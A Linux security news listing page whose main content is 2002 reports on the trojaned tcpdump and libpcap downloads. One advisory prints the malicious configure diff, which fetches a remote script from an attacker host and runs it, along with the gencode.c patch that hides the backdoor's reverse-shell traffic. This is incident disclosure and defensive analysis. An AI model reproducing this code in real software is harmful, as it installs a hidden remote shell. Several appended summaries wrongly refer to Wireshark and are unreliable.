Network Security
system security Linux network
system security Linux network The romanticized image of the digital nomad – a laptop on a sun-drenched balcony – rarely accounts for the actual friction of maintaining a professional development environment on the move. . The friction is amplified with Linux. We are looking for a setup that respects our kernel configurations, handles volatile network handovers, and maintains a strict security posture without the hand-holding of a consumer-grade OS – so, put simply, more than just a laptop and a sunny deck. The hardware is...
May 26, 2026
Server Securityopen-source Linux administration
open-source Linux administration Cron has existed in Unix and Linux environments for decades, handling backups, cleanup scripts, patching jobs, log rotation, monitoring tasks, and other maintenance work that administrators do not want to run manually. Most Linux servers rely on it constantly, which is exactly why attackers continue abusing it for persistence after a system has already been compromised. . Persistence through cron is not complicated. Attackers do not need a rootkit or advanced malware framework to maintain...
May 25, 2026
Vendors/Productssecurity breach linux
security breach linux A major internal repository breach at GitHub has exposed a critical and overlooked blind spot in Linux supply chain security. Kernel exploits, exposed SSH services, weak firewall rules, and vulnerable daemons dominated the Linux threat model for years, and in many environments, they still matter. But recent supply-chain incidents involving GitHub ecosystems, npm packages, and malicious developer tooling point somewhere else entirely: the developer workstation. . The breach matters because...
May 21, 2026
Security Trends access control multi-tenant
access control multi-tenant Linux administrators often face an ugly choice in the cloud: prioritize convenience and cost-efficiency by sharing infrastructure, or sacrifice those benefits for the sake of total isolation. Most modern Linux workloads don't live on their own private servers anymore. They live in shared environments like Kubernetes clusters, where multiple teams and services run side-by-side. It sounds efficient, and it usually is. . But cloud isolation isn't as ironclad as it looks on the diagram. If you...
May 21, 2026
Vendors/Productsincident response cloud security
incident response cloud security Managed Extended Detection and Response (MXDR) has become one of the most sought-after security services in the enterprise market — and with good reason. It promises the holy grail: broad visibility across endpoints, network, cloud, email, and identity, combined with the 24/7 human expertise most organizations simply cannot build in-house. . However, the rapid growth of the market has produced a wide range of providers whose capabilities vary considerably beneath the surface. Choosing the...
May 19, 2026
Refine news
X Clear Filters
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Loading...
Explore Latest Linux Security news
We found -1 articles for you...
74
network monitoringtraffic analysisperformance improvementImproving Packet Capture Methods for Gigabit Network Monitoring
Passive packet capture is necessary for many activities including network debugging and monitoring. With the advent of fast gigabit networks, packet capture is becoming a problem even on PCs due to the poor performance of popular OSs. The introduction of device polling has improved the capture process quite a bit but not really solved the problem. This paper proposes a new approach to passive packet capture that combined with device polling further improves it and allows, on fast machines, packets to be captured at (almost) wire speed. . . .. Passive packet capture is necessary for many activities including network debugging and monitoring. With the advent of fast gigabit networks, packet capture is becoming a problem even on PCs due to the poor performance of popular OSs. The introduction of device polling has improved the capture process quite a bit but not really solved the problem This paper proposes a new approach to passive packet capture that combined with device polling further improves it and allows, on fast machines, packets to be captured at (almost) wire speed. 1.Introduction Many network monitoring tools are based on passive packet capture. The principle is the following: the tool passively captures packets flowing on the network and analyzes them in order to compute traffic statistics and reports including network protocols being used, communication problems, network security and bandwidth usage. Many network tools that need to perform packet capture. Tcpdump, ethereal, and snort are based on a popular programming library called libpcap [libpcap] that provides a high level interface to packet capture. The main library features are: * Ability to capture from various network media such as ethernet, serial lines, virtual interfaces. * Same programming interface on every platform. * Advanced packet filtering capabilities based on BPF (Berkeley Packet Filtering), implemented into the OS kernel for better performance. Depending on the operating system, libpcap implements a virtual device from whichcaptured packets are read from user-space applications. Despite different platforms provide the very same API, the libpcap performance changes significantly according to the platform being used. On low traffic conditions there is no big difference among the various platforms, whereas at high speeds the situation changes significantly. The following table shows the outcome of some tests performed using a traffic generator [tcpreplay] on a fast host (Dual 1.8 GHz Athlon, 3Com 3c59x ethernet card) that sends packets to a mid-range PC (VIA C3 533 MHz, Intel 100Mbit ethernet card) connected over a 100 Mbit Ethernet switch (Cisco Catalyst 3548 XL) that is used to count the real number of packets sent/received by the hosts. The traffic generator reproduces at full speed (~80K pkt/sec) some traffic that has been captured previously, whereas the capture application is a simple application named pcount based on libpcap that counts and discards, with no further analysis, the captured packets. The link for this article located at net-security.org is no longer available. . The latest advancements in passive packet capture enhance high-speed network monitoring, using state-of-the-art hardware and machine learning for efficiency and real-time anomaly detection. Passive Packet Capture, Network Monitoring, Libpcap, Device Polling. . Anthony Pell
Jan 09, 2004
•
Network Security
83
security advisorytcpdumpnetwork monitoringTcpdump and Libpcap Security Advisory: Spyware Attack Detected
Security experts warn system administrators that rogue hackers have implanted spyware in the latest version of a popular open-source network-monitoring tool and its code library. The main Web site for downloading a popular open-source network-monitoring tool remained off-line Thursday following a revelation that rogue hackers had implanted spyware in the latest version of the software. . .. Security experts warn system administrators that rogue hackers have implanted spyware in the latest version of a popular open-source network-monitoring tool and its code library. The main Web site for downloading a popular open-source network-monitoring tool remained off-line Thursday following a revelation that rogue hackers had implanted spyware in the latest version of the software . Copies of tcpdump, a utility for monitoring data traffic on a network, and its library of code, called libpcap, had both been corrupted on the site, according to Michael Richardson, Webmaster for the site and a member of the open-source project that maintains the tools. "The server has been taken down until we can be sure we have found the problem," Richardson said in a phone interview Thursday. However, other sites had already downloaded the software from the main server and hosted the files on their own computers, a practice known as mirroring. It's unknown how many of these other sites have corrupted copies of the code, said Richardson, although some have already confirmed that they have found the Trojan horse. Tcpdump is a utility used by Unix, Linux and BSD system administrators to monitor--or "sniff"--the data that passes over the network. Libpcap is a code library that helps programmers write programs to tap into network data on many different platforms. The spyware component of the tainted software--called "conftes.c"--enables the hackers to send and execute any command on computers that contain the modified utility. The attack bears some hallmarks of a group of hackers that struck two other open-source projects,Sendmail and OpenSSH, in October. Specifically, the Trojan horse has commands that can be triggered by using the letters a, d and m--the name of a major underground hacking group. Whether the actual hackers were members of ADM, were framing the group, or were just using the group's tools is unknown. The hackers apparently broke into the server over the weekend from a computer in Finland and replaced the code with a corrupted version. The infected software remained available for more than two days because, Richardson said, he had been away from the main server, located in Canada, and the people who found the problem--members of the Houston Linux Users Group--didn't notify him. "It would have been nice to have a little bit more warning," Richardson said. "No one contacted me from that group." Matt Solnik, president of the Houston Linux Users Group, said the group contacted one of the other members of the tcpdump project less than an hour after realizing the software had been compromised. Another HLUG member, Russell Adams, had been installing Snort, an open-source intrusion detection system that uses the libpcap library, when a test that matches the software package with a unique fingerprint failed. The fingerprints, known more formally as digital signatures, are used as a security measure to make sure the software can't be surreptitiously changed. "He found some interesting code and we looked over it and found that it was a Trojan," Solnik said. By Tuesday night, HLUG had extracted the Trojan horse and had started notifying tcpdump's maintainers, said Solnik. Richardson expects to start analyzing the server Thursday night. He couldn't say when the project's server would again be available. More information is available in an advisory released by Carnegie Mellon University's Computer Emergency Response Team (CERT) Coordination Center. The link for this article located at News.com is no longer available. . Malicious actors embed malware within the most recent release of wireshark,jeopardizing data analysis applications, authorities caution.. tcpdump, libpcap, spyware attack, malware detection, network tools. . LinuxSecurity.com Team
Nov 14, 2002
•
Hacks/Cracks
83
security advisorytcpdumpmalwareTcpdump.org Incident: Trojan Found in Downloaded Utilities
The download site for two very common Linux based utilities, tcpdump.org, was hacked into on Nov. 11, and the software available for download was modified to contain Trojan Horse code. This Trojan Horse, or "back door" software allows the hacker that wrote it to access any machine on which the modified software is run. . .. The download site for two very common Linux based utilities, tcpdump.org, was hacked into on Nov. 11, and the software available for download was modified to contain Trojan Horse code. This Trojan Horse, or "back door" software allows the hacker that wrote it to access any machine on which the modified software is run . The two software items affected are tcpdump and libpcap, tools commonly used in information security applications. Some Intrusion Detection System (IDS) software requires libpcap. This is the most recent in a string of similar attacks. Sendmail, one of the most widely used e-mail server software packages, was also "trojaned" recently. Others affected in recent months have included OpenSSH, the secure remote access software, and even Fragroute, a hacker utility. The identity of the hacker conducting this campaign is unknown, as is whether a connection exists between the separate incidents. CERT released an advisory in which they ".encourage sites using libpcap and tcpdump to verify the authenticity of their distribution, regardless of where it was obtained." CERT provided the information necessary to determine the authenticity of any libpcap or tcpdump software recently downloaded. The advisory also encourages users to verify all software before installing it. "As a matter of good security practice, the CERT/CC encourages users to verify, whenever possible, the integrity of downloaded software." The link for this article located at ZDNet is no longer available. . The download site for two very common Linux based utilities, tcpdump.org, was hacked into on Nov. 11. download, common, linux, based, utilities, tcpdump, hacked. . LinuxSecurity.com Team
Nov 14, 2002
•
Hacks/Cracks
83
security advisorytcpdumpnetwork monitoringTcpdump & Libpcap Trojan Alert: Significant Exploit Detected
tcpdump and libpcap were trojaned on tcpdump.org and all but 1 official mirror. This trojan, similar to the OpenSSH trojan from a few months ago, was caught Gentoo's Portage System. When the configure script is run, it downloads a script from mars.rakeeti.net. This script contains an embedded shell that creates and compiles a C source file not part of the tcpdump/libpcap dsitrobution.. . . . tcpdump and libpcap were trojaned on tcpdump.org and all but 1 official mirror. This trojan, similar to the OpenSSH trojan from a few months ago, was caught Gentoo's Portage System. When the configure script is run, it downloads a script from mars.rakeeti.net. This script contains an embedded shell that creates and compiles a C source file not part of the tcpdump/libpcap dsitrobution. Latest libpcap & tcpdump sources from tcpdump.org contain a trojan. Background: Libpcap provides a packet sniffing library for programs like Snort. Tcpdump is a standard tool for packet sniffing. Details: The trojan contains modifications to the configure script and gencode.c (in libpcap only). The configure script downloads which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it. The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes: A - program exits D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34. M - closes connection, sleeps 3600 seconds, and then reconnects Hmm... ADM... It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections. Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic. This is similar to the OpenSSH trojan a few months ago. Updates: Many Mirrors are infected with the trojan!!! MainMirror Site (wiretapped.net) will no longer be providing tcpdump downloads until things are straightened out. Good sources: MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz Trojaned sources: tcpdump tcpdump MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz The (relevant) gencode.c diff: *** 288,293 **** --- 289,318 ---- { extern int n_errors; int len; + int l; + char *port = "1963"; + char *str, *tmp, *new = "not port 1963"; + + if (buf && *buf && strstr (buf, port)) { + buf = "port 1964"; + } + else { + l = strlen (new) + 1; + if (!(!buf || !*buf)) { + l += strlen (buf); + l += 5; /* and */ + } + + str = (char *)malloc (l); + str[0] = '\0'; + if (!(!buf || !*buf)) { + strcpy (str, buf); + strcat (str, " and "); + } + + strcat (str, new); + buf = str; + } no_optimize = 0; n_errors = 0; *************** The (relevant) configure diff: + CNF="services" + URL="mars.raketti.net/~mash/$CNF" ! (IFS="," ! ARGS="wget -q -O -,lynx --source,fetch -q -o -" ! ! for i in $ARGS; do ! IFS=" " ! $i $URL 1> $CNF ! if [ -f $CNF ]; then sh $CNF ! exit ! fi ! rm -f $CNF ! done) 1> /dev/null 2> /dev/null & The "services" payload: trojan-script, the non-obfuscated portion (excerpted) services, the complete version Thanks to: Russell Adams Mathew Solnik Scott Stout with the Houston Linux Users Group . Additional thanks to Bruce Locke for interpreting the backdoor code. Thanks to Antioffline.com for hosting us, and Gentoo's Portage system for catching the trojaned files via checksums. Last update: Wed Nov 13 03:44:08 CST 2002 . Compromised scripts infected Wireshark and TShark repositories across various distribution points, creating a critical vulnerability.. tcpdump Exploits, Libpcap Security, Network Monitoring, Malware Attacks. . LinuxSecurity.com Team
Nov 13, 2002
•
Hacks/Cracks
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Search Topics
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!
Discover faster search, smarter navigation, and deeper Linux security insights. Read More